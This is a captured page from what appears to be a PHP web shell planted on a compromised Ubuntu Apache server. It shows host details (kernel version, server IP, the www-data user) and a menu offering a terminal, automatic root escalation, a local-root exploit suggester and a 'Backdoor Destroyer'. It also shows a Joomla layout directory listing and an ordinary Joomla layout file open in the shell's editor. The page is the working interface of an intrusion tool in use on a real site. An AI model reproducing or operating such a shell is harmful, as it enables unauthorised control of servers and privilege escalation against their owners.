Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
layouts /
joomla /
edit /
Delete
Unzip
Name
Size
Permission
Date
Action
associations.php
927
B
-rw-r--r--
2017-10-04 08:52
details.php
1.92
KB
-rw-r--r--
2017-10-04 08:52
fieldset.php
1.16
KB
-rw-r--r--
2017-10-04 08:52
frontediting_modules.php
2.57
KB
-rw-r--r--
2017-10-04 08:52
global.php
1.37
KB
-rw-r--r--
2017-10-04 08:52
item_title.php
537
B
-rw-r--r--
2017-10-04 08:52
metadata.php
1.04
KB
-rw-r--r--
2017-10-04 08:52
params.php
3.42
KB
-rw-r--r--
2017-10-04 08:52
publishingdata.php
935
B
-rw-r--r--
2017-10-04 08:52
title_alias.php
539
B
-rw-r--r--
2017-10-04 08:52
Save
Rename
<?php /** * @package Joomla.Site * @subpackage Layout * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('JPATH_BASE') or die; $form = $displayData->getForm(); $options = array( 'formControl' => $form->getFormControl(), 'hidden' => (int) ($form->getValue('language', null, '*') === '*'), ); JHtml::_('behavior.core'); JHtml::_('jquery.framework'); JText::script('JGLOBAL_ASSOC_NOT_POSSIBLE'); JText::script('JGLOBAL_ASSOCIATIONS_RESET_WARNING'); JFactory::getDocument()->addScriptOptions('system.associations.edit', $options); JHtml::_('script', 'system/associations-edit.js', array('version' => 'auto', 'relative' => true)); // JLayout for standard handling of associations fields in the administrator items edit screens. echo $form->renderFieldset('item_associations');